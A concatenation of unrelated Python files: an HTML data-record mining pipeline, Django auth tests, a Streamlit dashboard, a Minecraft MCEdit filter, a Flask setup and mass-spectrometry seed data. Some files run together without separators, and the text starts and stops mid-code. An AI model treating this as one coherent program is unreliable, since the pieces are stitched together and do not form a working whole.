        stop_max_attempt_number=10,
        wait_exponential_multiplier=SEC,
        wait_exponential_max=10 * SEC,
        wrap_exception=True,
    )
    def call_url():
        logging.info("Requesting the page... page_id=%s", page_meta.page_id)
        # Fixed: the HTTP response was never closed; the context manager
        # releases the connection even when read() raises.
        with urllib.request.urlopen(page_meta.url, timeout=10) as response:
            return response.read()

    try:
        page = call_url()
    except retrying.RetryError:
        logging.warning(
            "Failed download the page, returning. page_id=%s", page_meta.page_id,
        )
        return
    logging.info("Writing down the file. page_id=%s", page_meta.page_id)
    fm.PageMeta.persist_html(page_meta.raw_html, page)
    logging.info("Saving download time in metadata file. page_id=%s", page_meta.page_id)
    now = datetime.datetime.now()
    page_meta.persist_download_datetime(now)
    logging.info("Done. page_id=%s", page_meta.page_id)
def cleanup_html(page_meta: fm.PageMeta, force_override: bool = False) -> None:
    """Produce the preprocessed HTML: raw HTML minus script/style/meta tags.

    Skips the work when a preprocessed file already exists, unless
    `force_override` is set.
    """
    logging.info("page_id=%s", page_meta.page_id)
    exists = page_meta.preprocessed_html.exists()
    if exists:
        logging.info(
            "Page has already been preprocessed. page_id=%s", page_meta.page_id,
        )
        if force_override:
            logging.info("It will be overwritten. page_id=%s", page_meta.page_id)
        else:
            logging.info("Operation skipped. page_id=%s", page_meta.page_id)
            return
    else:
        logging.info("Raw page will be preprocessed. page_id=%s", page_meta.page_id)
    logging.info(
        "Opening raw html file by removing stuff. page_id=%s", page_meta.page_id,
    )
    doc = fm.open_html_document(page_meta.raw_html, remove_stuff=True)
    logging.info(
        "Stripping <meta>, <script>, and <style> tags. page_id=%s", page_meta.page_id,
    )
    # strip_elements accepts several tag names at once -- one tree traversal
    # instead of the three separate passes the original made.
    lxml.etree.strip_elements(doc, "script", "style", "meta")
    logging.info("Writing down the file. page_id=%s", page_meta.page_id)
    fm.PageMeta.persist_html(page_meta.preprocessed_html, doc)
    logging.info("Done. page_id=%s", page_meta.page_id)
def precompute_distances(
    page_meta: fm.PageMeta, minimum_depth, max_tag_per_gnode, force_override: bool = False
):
    """Compute and persist the MDR node-distance table for one page.

    Reuses an existing pickle when it was computed with parameters at least
    as permissive as the ones requested; `force_override` always recomputes.
    """
    logging.info("page_id=%s", page_meta.page_id)
    exists = page_meta.distances_pkl.exists()
    if exists:
        logging.info(
            "Distances have already been precomputed, checking parameters... page_id=%s",
            page_meta.page_id,
        )
        precomputed = page_meta.load_precomputed_distances()
        precomputed_minimum_depth = precomputed["minimum_depth"]
        precomputed_max_tag_per_gnode = precomputed["max_tag_per_gnode"]
        # "More restrictive" = the old run allowed fewer tags per gnode or
        # required a deeper minimum depth than what is requested now.
        precomputed_was_more_restrictive = (
            precomputed_max_tag_per_gnode < max_tag_per_gnode
            or precomputed_minimum_depth > minimum_depth
        )
        if force_override:
            logging.info("It will be overwritten. page_id=%s", page_meta.page_id)
        elif precomputed_was_more_restrictive:
            logging.info(
                "The previously computed was more restrictive. It'll be overwritten. page_id=%s",
                page_meta.page_id,
            )
        else:
            logging.info("Operation skipped. page_id=%s", page_meta.page_id)
            return
    else:
        logging.info("The distances will be computed. page_id=%s", page_meta.page_id)
    node_namer, doc = get_named_nodes_html(page_meta)
    logging.info("Computing distances. page_id=%s", page_meta.page_id)
    distances = {}
    # core.compute_distances fills the `distances` dict in place.
    core.compute_distances(doc, distances, {}, node_namer, minimum_depth, max_tag_per_gnode)
    logging.info("Persisting distances. page_id=%s", page_meta.page_id)
    page_meta.persist_precomputed_distances(distances, minimum_depth, max_tag_per_gnode)
    logging.info("Done. page_id=%s", page_meta.page_id)
def precompute_data_regions(
    page_meta: fm.PageMeta,
    threshold: float,
    minimum_depth: int,
    max_tags_per_gnode: int,
    force_override: bool = False,
):
    """Compute and persist the MDR data regions for one page.

    Requires the distances pickle to exist. Reuses an existing regions
    pickle unless `force_override` is set or the previous run used a more
    restrictive (deeper) minimum depth.
    """
    logging.info("page_id=%s", page_meta.page_id)
    assert page_meta.distances_pkl.exists(), "Distances have NOT been precomputed!"
    exists = page_meta.data_regions_pkl(threshold, max_tags_per_gnode).exists()
    if exists:
        logging.info(
            "The data regions have already been precomputed, checking parameters... page_id=%s th=%.2f max_tags=%d",
            page_meta.page_id,
            threshold,
            max_tags_per_gnode,
        )
        if force_override:
            logging.info(
                "It will be overwritten. page_id=%s th=%.2f max_tags=%d",
                page_meta.page_id,
                threshold,
                max_tags_per_gnode,
            )
        else:
            precomputed = page_meta.load_precomputed_data_regions(threshold, max_tags_per_gnode)
            precomputed_minimum_depth = precomputed["minimum_depth"]
            # A deeper previous minimum depth means fewer nodes were
            # considered -- recompute; otherwise the cached result is enough.
            if precomputed_minimum_depth > minimum_depth:
                logging.info(
                    "The previously computed was more restrictive. It'll be overwritten. page_id=%s th=%.2f max_tags=%d",
                    page_meta.page_id,
                    threshold,
                    max_tags_per_gnode,
                )
            else:
                logging.info(
                    "Operation skipped. page_id=%s th=%.2f max_tags=%d",
                    page_meta.page_id,
                    threshold,
                    max_tags_per_gnode,
                )
                return
    else:
        logging.info(
            "The data regions will be computed. page_id=%s th=%.2f max_tags=%d",
            page_meta.page_id,
            threshold,
            max_tags_per_gnode,
        )
    node_namer, root = get_named_nodes_html(page_meta)
    logging.info(
        "Loading precomputed distances. page_id=%s th=%.2f max_tags=%d",
        page_meta.page_id,
        threshold,
        max_tags_per_gnode,
    )
    # todo (improvement) check for distances max tags per node
    distances = page_meta.load_precomputed_distances()
    logging.info(
        "Starting to compute data regions. page_id=%s th=%.2f max_tags=%d",
        page_meta.page_id,
        threshold,
        max_tags_per_gnode,
    )
    data_regions = {}
    # core.find_data_regions fills the `data_regions` dict in place.
    core.find_data_regions(
        root, node_namer, minimum_depth, distances, data_regions, threshold, max_tags_per_gnode
    )
    logging.info(
        "Persisting data regions. page_id=%s th=%.2f max_tags=%d",
        page_meta.page_id,
        threshold,
        max_tags_per_gnode,
    )
    page_meta.persist_precomputed_data_regions(
        data_regions, threshold, minimum_depth, max_tags_per_gnode
    )
    logging.info(
        "Done. page_id=%s th=%.2f max_tags=%d", page_meta.page_id, threshold, max_tags_per_gnode
    )
def precompute_data_records(
    page_meta: fm.PageMeta,
    thresholds: core.MDREditDistanceThresholds,
    max_tags_per_gnode: int,
    force_override: bool = False,
):
    """Compute and persist the MDR data records for one page.

    Requires the distances AND data-regions pickles to exist. Reuses an
    existing records pickle unless `force_override` is set.
    """
    logging.info("page_id=%s", page_meta.page_id)
    assert page_meta.distances_pkl.exists(), "Distances have NOT been precomputed!"
    # Fixed: `.exists()` was missing -- the Path object itself is always
    # truthy, so the precondition was never actually checked.
    assert page_meta.data_regions_pkl(
        thresholds.data_region, max_tags_per_gnode
    ).exists(), "Data regions have NOT been precomputed!"
    exists = page_meta.data_records_pkl(thresholds, max_tags_per_gnode).exists()
    if exists:
        logging.info(
            "The data records have already been precomputed. page_id=%s th=%s max_tags=%d",
            page_meta.page_id,
            thresholds,
            max_tags_per_gnode,
        )
        if force_override:
            logging.info(
                "It will be overwritten. page_id=%s th=%s max_tags=%d",
                page_meta.page_id,
                thresholds,
                max_tags_per_gnode,
            )
        else:
            # todo(improvement) include min depth checking????
            logging.info(
                "Operation skipped. page_id=%s th=%s max_tags=%d",
                page_meta.page_id,
                thresholds,
                max_tags_per_gnode,
            )
            return
    else:
        logging.info(
            "The data records will be computed. page_id=%s th=%s max_tags=%d",
            page_meta.page_id,
            thresholds,
            max_tags_per_gnode,
        )
    node_namer, root = get_named_nodes_html(page_meta)
    logging.info(
        "Loading precomputed data regions. page_id=%s th=%s max_tags=%d",
        page_meta.page_id,
        thresholds,
        max_tags_per_gnode,
    )
    # todo (improvement) check for distances max tags per node
    distances = page_meta.load_precomputed_distances()
    data_regions = page_meta.load_precomputed_data_regions(
        thresholds.data_region, max_tags_per_gnode
    )
    logging.info(
        "Starting to compute data records. page_id=%s th=%s max_tags=%d",
        page_meta.page_id,
        thresholds,
        max_tags_per_gnode,
    )
    data_records = core.find_data_records(
        root, data_regions, distances, node_namer, thresholds, max_tags_per_gnode
    )
    logging.info(
        "Persisting data records. page_id=%s th=%s max_tags=%d",
        page_meta.page_id,
        thresholds,
        max_tags_per_gnode,
    )
    page_meta.persist_precomputed_data_records(data_records, thresholds, max_tags_per_gnode)
    logging.info(
        "Done. page_id=%s th=%s max_tags=%d", page_meta.page_id, thresholds, max_tags_per_gnode
    )
def get_named_nodes_html(page_meta: fm.PageMeta) -> Tuple[core.NodeNamer, lxml.html.HtmlElement]:
    """Return (node_namer, html_root) for the page, computing and caching the
    named-nodes HTML on first use.

    Requires the preprocessed HTML to exist when the named-nodes file has
    not been generated yet.
    """
    if page_meta.named_nodes_html.exists():
        logging.info(
            "Loading the named nodes html. page_id=%s", page_meta.page_id,
        )
        root = page_meta.get_named_nodes_html_tree()
        logging.info("Loading node namer. page_id=%s", page_meta.page_id)
        # Names are already embedded in the saved tree.
        node_namer = core.NodeNamer(for_loaded_file=True)
    else:
        logging.info(
            "Named nodes have NOT been saved, computing it. page_id=%s", page_meta.page_id,
        )
        assert page_meta.preprocessed_html.exists()
        logging.info("Opening preprocessed html. page_id=%s", page_meta.page_id)
        root = page_meta.get_preprocessed_html_tree()
        logging.info("Loading node namer. page_id=%s", page_meta.page_id)
        node_namer = core.NodeNamer()
        # load() walks the tree and assigns a stable name to every node.
        node_namer.load(root)
        logging.info(
            "Saving named nodes html. page_id=%s", page_meta.page_id,
        )
        fm.PageMeta.persist_html(page_meta.named_nodes_html, root)
    return node_namer, root
def color_html(page_meta: fm.PageMeta, mdr: core.MDR) -> None:
    # TODO: not implemented -- intended to colorize detected records in the HTML.
    pass
|
# Test Helpers
from django.test import TestCase, Client
from django.urls import reverse
import json
# Models
from ...models.author import Author
from ...models.signupRequest import Signup_Request
class TestAuthView(TestCase):
    """Endpoint tests for registration, login, and token-based auth."""

    def setUp(self):
        self.client = Client()
        # Urls
        self.register_url = reverse('register-author')
        self.login_url = reverse('login')
        self.get_current_author_url = reverse('get-current-author')
        # Mock Data for POST
        self.mock_author_instance = Author.objects.create_user(
            username="testusername",
            password="testpassword",
            displayName='testUser',
            host="http://localhost:8000",
        )
        # Activate explicitly so login can succeed.
        self.mock_author_instance.is_active = True
        self.mock_author_instance.save()

    def test_register_POST(self):
        # Register Fake User
        self.mock_author_register = {
            'username': 'testusername1',
            'password': 'testpassword',
            'displayName': 'Test DisplayName',
            'github': 'https://github.com/',
        }
        # Check that the user we are about to add does not already exist
        self.assertEqual(Signup_Request.objects.filter(username="testusername1").exists(), False)
        # Make request to create a signup request for this new user
        response = self.client.post(
            self.register_url,
            self.mock_author_register,
            content_type="application/json", SERVER_NAME="localhost:8000")
        self.assertEqual(response.status_code, 201)
        # Check that a signup request was made
        self.assertEqual(Signup_Request.objects.filter(username="testusername1").exists(), True)

    def test_login_success_POST(self):
        # Attempt to login using the username and password of the mock_author
        response = self.client.post(
            self.login_url,
            {'username': 'testusername', 'password': 'testpassword'},
            content_type="application/json",
        )
        self.assertEqual(response.status_code, 200)
        # Successful login returns both a token and the user payload.
        self.assertTrue('token' in response.data.keys())
        self.assertTrue('user' in response.data.keys())

    def test_login_fail_POST(self):
        # Attempt to login using the username and password of the mock_author
        response = self.client.post(
            self.login_url,
            {'username': 'testusernamedoesntexist', 'password': 'testpassword'},
            content_type="application/json",
        )
        self.assertEqual(response.status_code, 401)

    def test_token_valid_success_POST(self):
        # Attempt to login using the username and password of the mock_author
        response = self.client.post(
            self.login_url,
            {'username': 'testusername', 'password': 'testpassword'},
            content_type="application/json",
        )
        token = response.data['token']
        headers = {
            'HTTP_AUTHORIZATION': f"Bearer {token}"
        }
        # Get the current user using the token
        response = self.client.get(self.get_current_author_url, **headers)
        self.assertEqual(response.status_code, 200)

    def test_token_valid_fail_POST(self):
        # A made-up bearer token must be rejected with 403.
        headers = {
            'HTTP_AUTHORIZATION': f"Bearer sometokenthatijustmadeup",
            'HTTP_Origin': 'http://localhost:3000/'
        }
        # Get the current user using the token
        response = self.client.get(self.get_current_author_url, **headers)
        self.assertEqual(response.status_code, 403)
|
import streamlit as st
import visao_geral
import estacao
import responsavel
# Hide Menu
# CSS injected below hides Streamlit's default hamburger menu and footer.
hide_streamlit_style = """
<style>
#MainMenu {visibility: hidden;}
footer {visibility: hidden;}
</style>
"""
st.markdown(hide_streamlit_style, unsafe_allow_html=True)
st.image("imgs/smtr-logo.jpeg")
st.title("Avaliação das estações BRT")
# Each radio option dispatches to one sub-page module's main().
res = st.radio("Selecione uma Visão", ["Geral", "Estações", "Responsáveis"])
if res == "Geral":
    visao_geral.main()
elif res == "Estações":
    estacao.main()
else:
    responsavel.main()
# Feel free to modify and use this filter however you wish. If you do,
# please give credit to SethBling.
# http://youtube.com/SethBling
from pymclevel import TAG_List
from pymclevel import TAG_Byte
from pymclevel import TAG_Int
from pymclevel import TAG_Compound
from pymclevel import TAG_Short
from pymclevel import TAG_Float
from pymclevel import TAG_Double
from pymclevel import TAG_String
# Name shown in MCEdit's filter list.
displayName = "Change Mob Properties"

# Villager profession name -> numeric NBT Profession id.
Professions = {
    "Farmer (brown)": 0,
    "Librarian (white)": 1,
    "Priest (purple)": 2,
    "Blacksmith (black apron)": 3,
    "Butcher (white apron)": 4,
    "Villager (green)": 5,
}

# "N/A" sentinel first, then every profession name. Built in one expression
# instead of concatenating a one-element tuple per key in a loop.
ProfessionKeys = ("N/A",) + tuple(Professions.keys())

# Sentinel meaning "leave this property unchanged".
noop = -1337

# (label, default) pairs rendered as the filter's input form.
inputs = (
    ("Health", noop),
    ("VelocityX", noop),
    ("VelocityY", noop),
    ("VelocityZ", noop),
    ("Fire", noop),
    ("FallDistance", noop),
    ("Air", noop),
    ("AttackTime", noop),
    ("HurtTime", noop),
    ("Lightning Creeper", ("N/A", "Lightning", "No Lightning")),
    ("Enderman Block Id", noop),
    ("Enderman Block Data", noop),
    ("Villager Profession", ProfessionKeys),
    ("Slime Size", noop),
    ("Breeding Mode Ticks", noop),
    ("Child/Adult Age", noop),
)
def perform(level, box, options):
    """MCEdit filter entry point: apply the selected property overrides to
    every entity positioned inside the selection box.

    Any option left at `noop` (or "N/A") is skipped, so only explicitly
    chosen properties are written back into the entity NBT.
    """
    health = options["Health"]
    vx = options["VelocityX"]
    vy = options["VelocityY"]
    vz = options["VelocityZ"]
    fire = options["Fire"]
    fall = options["FallDistance"]
    air = options["Air"]
    attackTime = options["AttackTime"]
    hurtTime = options["HurtTime"]
    powered = options["Lightning Creeper"]
    blockId = options["Enderman Block Id"]
    blockData = options["Enderman Block Data"]
    profession = options["Villager Profession"]
    size = options["Slime Size"]
    breedTicks = options["Breeding Mode Ticks"]
    age = options["Child/Adult Age"]
    for (chunk, slices, point) in level.getChunkSlices(box):
        for e in chunk.Entities:
            x = e["Pos"][0].value
            y = e["Pos"][1].value
            z = e["Pos"][2].value
            # Only touch entities whose position is inside the selection box.
            if x >= box.minx and x < box.maxx and y >= box.miny and y < box.maxy and z >= box.minz and z < box.maxz:
                # "Health" distinguishes mobs from items/projectiles -- only
                # mobs get any of the overrides below.
                if "Health" in e:
                    if health != noop:
                        e["Health"] = TAG_Short(health)
                    if vx != noop:
                        e["Motion"][0] = TAG_Double(vx)
                    if vy != noop:
                        e["Motion"][1] = TAG_Double(vy)
                    if vz != noop:
                        e["Motion"][2] = TAG_Double(vz)
                    if fire != noop:
                        e["Fire"] = TAG_Short(fire)
                    if fall != noop:
                        e["FallDistance"] = TAG_Float(fall)
                    if air != noop:
                        e["Air"] = TAG_Short(air)
                    if attackTime != noop:
                        e["AttackTime"] = TAG_Short(attackTime)
                    if hurtTime != noop:
                        e["HurtTime"] = TAG_Short(hurtTime)
                    # Entity-type-specific properties below.
                    if powered != "N/A" and e["id"].value == "Creeper":
                        if powered == "Lightning":
                            e["powered"] = TAG_Byte(1)
                        if powered == "No Lightning":
                            e["powered"] = TAG_Byte(0)
                    if blockId != noop and e["id"].value == "Enderman":
                        e["carried"] = TAG_Short(blockId)
                    if blockData != noop and e["id"].value == "Enderman":
                        e["carriedData"] = TAG_Short(blockData)
                    if profession != "N/A" and e["id"].value == "Villager":
                        e["Profession"] = TAG_Int(Professions[profession])
                    if size != noop and e["id"].value == "Slime":
                        e["Size"] = TAG_Int(size)
                    if breedTicks != noop:
                        e["InLove"] = TAG_Int(breedTicks)
                    if age != noop:
                        e["Age"] = TAG_Int(age)
        # Mark the chunk for re-save after its entities were edited.
        chunk.dirty = True
|
from websiteapp import models
from rest_framework.serializers import ModelSerializer,SerializerMethodField
class IconSerializer(ModelSerializer):
    """Serializes a WebSite's icon together with the serving host's root URL."""

    handle_link = SerializerMethodField()

    class Meta:
        model = models.WebSite
        fields = ['icon', 'handle_link']

    def get_handle_link(self, instance):
        '''
        :param instance: the WebSite being serialized (unused; link depends on the request only)
        :return: the current site root, e.g. http://localhost:8000/
        '''
        request = self.context.get('request')
        return f'{request.scheme}://{request.get_host()}/'
from bs4 import BeautifulSoup
from IPython import embed
def generate_html():
    """Return a small fixed HTML document with four anchor links (demo fixture)."""
    document = """
<html>
<head></head>
<body>
<a href="/a.html">A</a>
<a href="/b.html">B</a>
<a href="/c.html">C</a>
<a href="/d.html">D</a>
</body>
</html>
"""
    return document
def main():
    """Drop into an IPython shell with the demo HTML in scope for exploration."""
    html_doc = generate_html()
    # Interactive session; the commented lines below are the intended exercise.
    embed()
    # soup = BeautifulSoup(html_doc, "html.parser")
    # a_elements = soup.find_all("a", href=True)
    # for a_element in a_elements:
    #     print(a_element['href'])
    # [a_element['href'] for a_element in BeautifulSoup(html_doc, "html.parser").find_all("a", href=True)]
# Only start the interactive session when run as a script.
if __name__ == "__main__":
    main()
import os
from sqlalchemy import create_engine
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
import jinja2
import requests, json
from datetime import datetime
# Finding all our directories for this template
base_dir = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..'))
template_dir = os.path.join(base_dir, 'templates')
static_dir = os.path.join(base_dir, 'static')
base_template_dir = os.path.join(template_dir, 'base_templates')
# Making the Flask app
app = Flask(__name__,
            static_url_path='',
            static_folder=static_dir)
# Adding some of the directories to Jinja (for loading templates)
my_loader = jinja2.ChoiceLoader([
    app.jinja_loader,
    jinja2.FileSystemLoader([template_dir,
                             base_template_dir,
                             static_dir]),
])
app.jinja_loader = my_loader
# Load the config file
app.config.from_pyfile('config.py')
# Setup the final connection string for SQLAlchemy
app.config['SQLALCHEMY_DATABASE_URI'] = app.config['CONN_STR_W_DB']
db = SQLAlchemy(app)
# Import user after setup (important)
from user import User
from stripe_obj import Stripe
from notifications import Notifications
# Within our app context, create all missing tables
db.create_all()
# 'basic' session protection: Flask-Login invalidates sessions on identity change.
login_manager = LoginManager(app)
login_manager.session_protection = 'basic'
@login_manager.user_loader
def load_user(id):
    """Flask-Login user loader: fetch user *id* from the user service.

    Returns a User instance, or None when the service is unreachable or
    responds non-200 (Flask-Login treats None as "not logged in").
    """
    url = ('http://' + app.config['BASE_URL'] + ':'
           + app.config['USER_PORT'] + '/getuser/' + str(id))
    try:
        # Fixed: no timeout meant an unresponsive user service hung every
        # request; a connection error crashed the request instead of
        # degrading to an anonymous session.
        r = requests.get(url, timeout=5)
    except requests.RequestException:
        return None
    if r.status_code == 200:
        user_dict = json.loads(r.text)
        user = User(**user_dict)
        # created_date arrives as an RFC-1123 string from the JSON API.
        user.created_date = datetime.strptime(user.created_date, '%a, %d %b %Y %H:%M:%S %Z')
        return user
    else:
        return None
@app.after_request
def add_security_headers(response):
    """Attach standard browser-hardening headers to every outgoing response."""
    security_headers = {
        'X-Content-Type-Options': 'nosniff',
        'X-Frame-Options': 'SAMEORIGIN',
        'X-XSS-Protection': '1; mode=block',
    }
    for header_name, header_value in security_headers.items():
        response.headers[header_name] = header_value
    # If you want all HTTP converted to HTTPS
    # response.headers['Strict-Transport-Security'] = 'max-age=31536000; includeSubDomains'
    return response
print('>>>App is setup') |
import json
from typing import List
from odm2_postgres_api.schemas.schemas import (
SamplingFeaturesCreate,
MethodsCreate,
VariablesCreate,
ControlledVocabularyCreate,
AnnotationsCreate,
DirectivesCreate,
)
def mass_spec_annotations() -> List[AnnotationsCreate]:
    """Return the specimen annotations used to tag mass-spec samples."""
    annotation_texts = [
        "Non-target mass spectrometry",
        "blank",
        "subject",
    ]
    return [
        AnnotationsCreate(annotationtypecv="Specimen annotation", annotationtext=text)
        for text in annotation_texts
    ]
def mass_spec_directives() -> List[DirectivesCreate]:
    """Return the "Project" directives registered for mass-spec processing."""
    # (directivename, directivedescription) pairs; all share the Project type.
    projects = [
        ("mass_spec:test_project", "This project is used for testing software"),
        ("mass_spec:md_screening_2020", "non target screening requested by miljødirektoratet"),
        ("mass_spec:1000lakes_2020", "non target screening within 1000lakes project"),
        ("mass_spec:ARMOUR_china_test", "Non target analysis of chinese drinking water data"),
        ("mass_spec:Processing_at_NILU", "Non target analysis ran by NILU researchers"),
        ("mass_spec:Processing_at_NILU_test", "Non target analysis ran by NILU researchers"),
    ]
    return [
        DirectivesCreate(
            directivetypecv="Project",
            directivename=name,
            directivedescription=description,
        )
        for name, description in projects
    ]
def mass_spec_sampling_features() -> List[SamplingFeaturesCreate]:
    """Return the sampling-feature (site) records seeded for mass spec."""
    dalsvatnet = SamplingFeaturesCreate(
        samplingfeatureuuid="3fa85f64-5717-4562-b3fc-2c963f66afa6",
        samplingfeaturetypecv="Site",
        samplingfeaturecode="901-3-8",
        samplingfeaturename="Dalsvatnet",
        samplingfeaturedescription="Station ID: 3275",
    )
    return [dalsvatnet]
# Controlled-vocabulary entries (cv_variablename) for the data products of the
# LC-QTOF pipeline; wrapped into models by mass_spec_controlled_vocabularies().
mass_spec_cv = [
    {
        "name": "LC_QTOF_Raw",
        "term": "Raw data produced by Liquid Chromatography coupled to Quadrupole Time of Flight instrument",
        "definition": "Raw data produced by Liquid Chromatography coupled to Quadrupole Time of Flight instrument",
        "category": "Chemistry",
        "controlled_vocabulary_table_name": "cv_variablename",
    },
    {
        "name": "LC_QTOF_mzXML",
        "term": "Data produced by Liquid Chromatography coupled to Quadrupole Time of Flight instrument"
        "and converted to mzXML format",
        "definition": "Data produced by Liquid Chromatography coupled to Quadrupole Time of Flight "
        "instrument and converted to mzXML format",
        "category": "Chemistry",
        "controlled_vocabulary_table_name": "cv_variablename",
    },
    {
        "name": "LC_QTOF_Peaks",
        "term": "Peaks detected by Liquid Chromatography coupled to Quadrupole Time of Flight instrument",
        "definition": "List of peaks and their properties to be further identified as chemicals",
        "category": "Chemistry",
        "controlled_vocabulary_table_name": "cv_variablename",
    },
    {
        "name": "LC_QTOF_Peaks_and_Fragments",
        "term": "Peaks and their fragments "
        "detected by Liquid Chromatography coupled to Quadrupole Time of Flight instrument",
        "definition": "List of peaks, associated peaks and their properties to be further identified as chemicals",
        "category": "Chemistry",
        "controlled_vocabulary_table_name": "cv_variablename",
    },
    {
        "name": "LC_QTOF_Chemicals",
        "term": "Chemicals detected by Liquid Chromatography coupled to Quadrupole Time of Flight instrument",
        "definition": "List of chemicals identified based on LC_QTOF_Peaks_and_Fragments",
        "category": "Chemistry",
        "controlled_vocabulary_table_name": "cv_variablename",
    },
]
def mass_spec_controlled_vocabularies() -> List[ControlledVocabularyCreate]:
    """Wrap each raw ``mass_spec_cv`` entry in a ControlledVocabularyCreate."""
    vocabularies = []
    for entry in mass_spec_cv:
        vocabularies.append(ControlledVocabularyCreate(**entry))
    return vocabularies
def mass_spec_variables() -> List[VariablesCreate]:
    """Return the chemistry variables produced at each stage of the pipeline.

    Each entry pairs a controlled-vocabulary variable name (see ``mass_spec_cv``)
    with a variable code; -9999 is the no-data sentinel used throughout.

    Fix: the original wrapped every variablecode in an f-string with no
    placeholders (flake8 F541); plain string literals are used instead. The
    code values themselves are unchanged.
    """
    # (variablenamecv, variabledefinition, variablecode)
    # NOTE(review): codes jump from mass_spec_01 to mass_spec_1 - kept as-is,
    # since existing records may already reference these exact codes.
    stages = [
        (
            "LC_QTOF_Raw",
            "Raw data produced by Liquid Chromatography coupled to Quadrupole Time of Flight "
            "instrument",
            "mass_spec_00",
        ),
        (
            "LC_QTOF_mzXML",
            "Data produced by Liquid Chromatography coupled to Quadrupole Time of Flight "
            "instrument and converted to mzXML format",
            "mass_spec_01",
        ),
        (
            "LC_QTOF_Peaks",
            "Peaks detected by Liquid Chromatography coupled to Quadrupole Time of Flight "
            "instrument",
            "mass_spec_1",
        ),
        (
            "LC_QTOF_Peaks_and_Fragments",
            "Peaks and fragments detected by Liquid Chromatography coupled to Quadrupole "
            "Time of Flight instrument",
            "mass_spec_2",
        ),
        (
            "LC_QTOF_Chemicals",
            "Peaks identified in Liquid Chromatography coupled to Quadrupole Time of Flight "
            "instrument",
            "mass_spec_3",
        ),
    ]
    return [
        VariablesCreate(
            variabletypecv="Chemistry",
            variablenamecv=name,
            variabledefinition=definition,
            variablecode=code,
            nodatavalue=-9999,
        )
        for name, definition, code in stages
    ]
def mass_spec_methods(org_id: int) -> List[MethodsCreate]:
    """Return every mass-spec processing method owned by organization ``org_id``.

    Covers the full pipeline: specimen collection/fractionation, the MS run,
    raw-data conversion (ms_convert*), feature detection (fd_*), deconvolution
    (fdc_*), identification (fid_*) and the blank/replica filters. Versioned
    variants (e.g. fd_0.5.22) pin a tool git revision inside the annotation JSON.

    Fix: the original repeated the annotation scaffolding and shared
    descriptions/parameter dicts two dozen times; they are factored into local
    helpers. All stored strings (including the pre-existing typos such as
    "sudo 3D" and the missing spaces at string-concatenation joins) and the
    JSON key order are preserved byte-for-byte, since they are persisted data.
    """

    def annotation(params: dict) -> list:
        # Single "Method annotation" carrying the tool parameters as JSON.
        return [
            {
                "annotationtypecv": "Method annotation",
                "annotationtext": "The json field holds the parameters with which this method will be executed",
                "annotationjson": json.dumps(params),
            }
        ]

    def derivation(code: str, name: str, description: str, params: dict = None) -> dict:
        # All processing steps share the "Derivation" method type; only
        # parameterized steps get an annotations list.
        method = {
            "methodtypecv": "Derivation",
            "methodcode": code,
            "methodname": name,
            "methoddescription": description,
            "organizationid": org_id,
        }
        if params is not None:
            method["annotations"] = annotation(params)
        return method

    # Shared descriptions (kept verbatim - they are stored data).
    fd_description = (
        "Detects features in raw data. This is method is a sudo 3D method"
        "where 1 gaussian is fit in each direction."
    )
    fdc_description = (
        "Find fragments for peaks detected with fd_* method."
        "Upgraded version of fdc which considers adducts."
    )
    fid_description = "Identifies features previously detected using a fd_* and fdc methods. "

    # Baseline parameter sets; variants override/extend via dict unpacking,
    # which preserves the original key insertion order in the JSON.
    fd_params = {
        "mz_range": [0, 0],
        "n_iter": 20000,
        "n_scan": 300,
        "mz_res": 20000,
        "mz_win": 0.02,
        "adj_r2": 0.75,
        "min_int": 1000,
        "int_var": 5,
        "s2n": 2,
        "min_nscan": 3,
    }
    fdc_params = {
        "mz_range": [0, 0],
        "mass_win_per": 0.8,
        "ret_win_per": 0.5,
        "delta_mass": 0.004,
        "min_int_frag": 300,
        "r_thresh": 0.75,
    }
    fid_params = {"id_feature_wgts": [1, 1, 1, 1, 1, 1, 1]}

    methods = [
        {
            "methodtypecv": "Specimen collection",
            "methodcode": "mass_spec:collect_sample",
            "methodname": "collect_sample",
            "methoddescription": "Collecting sample in the field",
            "organizationid": org_id,
        },
        {
            "methodtypecv": "Specimen fractionation",
            "methodcode": "mass_spec:fractionate_sample",
            "methodname": "fractionate_sample",
            "methoddescription": "Create a set of sub-samples",
            "organizationid": org_id,
        },
        {
            "methodtypecv": "Specimen analysis",
            "methodcode": "mass_spec:create_data",
            "methodname": "ms run",
            "methoddescription": "Running mass spectrometer",
            "organizationid": org_id,
        },
        derivation(
            "mass_spec:ms_convert_filter_scanEvent_1_2",
            "ms convert",
            "",
            {
                "verbose": "-v",
                "bits": "--32",
                "output": "--mzXML",
                "filter": ' --filter "scanEvent 1-2"',
            },
        ),
        derivation(
            "mass_spec:ms_convert",
            "ms convert",
            "",
            {"verbose": "-v", "bits": "--32", "output": "--mzXML"},
        ),
        derivation(
            "mass_spec:filter_blanks",
            "blank filter",
            "Remove from peak list peaks which replicate in blank sample replicas.",
        ),
        derivation(
            "mass_spec:filter_replicas",
            "replica filter",
            "Remove from peak list peaks which do not replicas in all "
            "replicas of the parent sample.",
        ),
        derivation(
            "mass_spec:filter_replicas_and_blanks",
            "replica and blank filter",
            "Remove from peak list peaks which do not replicas in all "
            "replicas of the parent sample. Subsequently remove from peak list peaks "
            "which do not replicas in all "
            "replicas of the parent sample.",
        ),
        derivation(
            "mass_spec:combine_features",
            "feature combination",
            "After feature deconvolution has completed for multiple replicas, "
            "a list of peaks is output for each replica. These are combined into a single "
            "list of peaks, in which non-replicating peaks are removed and replicating peaks "
            "are averaged. This is the input peak list for feature identification.",
        ),
        derivation("mass_spec:fd_s3D", "feature detection", fd_description, fd_params),
        derivation(
            "mass_spec:fd_s3D_test",
            "feature detection",
            fd_description,
            {**fd_params, "n_iter": 200},
        ),
        derivation(
            "mass_spec:fd_0.5.22",
            "feature detection",
            fd_description,
            {**fd_params, "safd": "e9f11c2"},
        ),
        derivation(
            "mass_spec:fd_0.5.31",
            "feature detection",
            fd_description,
            {**fd_params, "safd": "8cb7c42"},
        ),
        derivation(
            "mass_spec:fd_0.5.22_int4000",
            "feature detection",
            fd_description,
            {**fd_params, "min_int": 4000, "safd": "e9f11c2"},
        ),
        derivation(
            "mass_spec:fd_0.5.22_test",
            "feature detection",
            fd_description,
            {**fd_params, "n_iter": 200, "safd": "e9f11c2"},
        ),
        derivation("mass_spec:fdc_comp_DIA", "feature deconvolution", fdc_description, fdc_params),
        derivation("mass_spec:fid_ulsa", "feature identification", fid_description, fid_params),
        derivation(
            "mass_spec:fdc_0.8.30",
